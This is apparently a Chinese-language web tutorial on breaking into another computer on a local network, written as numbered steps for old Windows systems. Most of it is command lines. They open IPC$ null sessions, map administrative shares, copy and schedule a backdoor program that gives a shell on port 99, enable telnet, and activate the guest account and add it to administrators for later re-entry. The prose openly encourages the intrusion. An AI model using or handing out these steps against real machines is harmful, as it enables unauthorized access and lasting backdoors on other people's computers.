局域網入侵另一臺電腦（局域網入侵）

1、相關命令 　　建立空連接 　　　　net use [url=file://IP/ipc$]\IPipc$[/url] "" /user:"" (一定要注意:這一行命令中包含了3個空格) 　　建立非空連接 　　　　net use [url=file://IP/ipc$]\IPipc$[/url] "用戶名" /user:"密碼" (同樣有3個空格) 　　映射默認共享 　　　　net use z: [url=file://IP/c$]\IPc$[/url] "密碼" /user:"用戶名" (即可將對方的c盤映射為自己的z盤，其他盤類推) 　　如果已經和目標建立了ipc$，則可以直接用IP+盤符+$訪問,具體命令 net use z: [url=file://IP/c$]\IPc$[/url] 　　刪除一個ipc$連接 　　　　net use [url=file://IP/ipc$]\IPipc$[/url] /del 　　刪除共享映射 　　　　net use c: /del 刪除映射的c盤，其他盤類推 　　　　net use * /del 刪除全部,會有提示要求按y確認 經典入侵模式 　　1.C:>net use [url=file://127.0.0.1/IPC$]\127.0.0.1IPC$[/url] "" /user:"admintitrators" 　　這是用《流光》掃到的用戶名是administrators，密碼為"空"的IP地址(空口令?哇,運氣好到家了)，如果是打算攻擊的話，就可以用這樣的命令來與127.0.0.1建立一個連接，因為密碼為"空"，所以第一個引號處就不用輸入，后面一個雙引號里的是用戶名，輸入administrators，命令即可成功完成。

(資料圖片)

2、 　　2. C:>copy srv.exe [url=file://127.0.0.1/admin$]\127.0.0.1admin$[/url] 　　先復制srv.exe上去，在流光的Tools目錄下就有（這里的$是指admin用戶的c:winntsystem32，大家還可以使用c$、d$，意思是C盤與D盤，這看你要復制到什么地方去了）。

3、 　　3.C:>net time [url=file://127.0.0.1/]\127.0.0.1[/url] 　　查查時間，發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00，命令成功完成。

4、 　　4.C:>at [url=file://127.0.0.1/]\127.0.0.1[/url] 11:05 srv.exe 　　用at命令啟動srv.exe吧（這里設置的時間要比主機時間快，不然你怎么啟動啊，呵呵！） 　　5.C:>net time [url=file://127.0.0.1/]\127.0.0.1[/url] 　　再查查到時間沒有？如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05，那就準備開始下面的命令。

5、 　　6.C:>telnet 127.0.0.1 99 　　這里會用到Telnet命令吧，注意端口是99。

6、Telnet默認的是23端口，但是我們使用的是SRV在對方計算機中為我們建立一個99端口的Shell。

7、 　　雖然我們可以Telnet上去了，但是SRV是一次性的，下次登錄還要再激活！所以我們打算建立一個Telnet服務！這就要用到ntlm了 　　7.C:>copy ntlm.exe [url=file://127.0.0.1/admin$]\127.0.0.1admin$[/url] 　　用Copy命令把ntlm.exe上傳到主機上（ntlm.exe也是在《流光》的Tools目錄中）。

8、 　　8.C:WINNTsystem32>ntlm 　　輸入ntlm啟動（這里的C:WINNTsystem32>指的是對方計算機，運行ntlm其實是讓這個程序在對方計算機上運行）。

9、當出現"DONE"的時候，就說明已經啟動正常。

10、然后使用"net start telnet"來開啟Telnet服務！ 　　9.Telnet 127.0.0.1，接著輸入用戶名與密碼就進入對方了，操作就像在DOS上操作一樣簡單！(然后你想做什么?想做什么就做什么吧,哈哈) 　　為了以防萬一,我們再把guest激活加到管理組 　　10.C:>net user guest /active:yes 　　將對方的Guest用戶激活 　　11.C:>net user guest 1234 　　將Guest的密碼改為1234,或者你要設定的密碼 　　12.C:>net localgroup administrators guest /add 　　將Guest變為Administrator^_^(如果管理員密碼更改，guest帳號沒改變的話，下次我們可以用guest再次訪問這臺計算機) ipc$與空連接,139,445端口,默認共享的關系。

本文到此講解完畢了，希望對大家有幫助。

關鍵詞：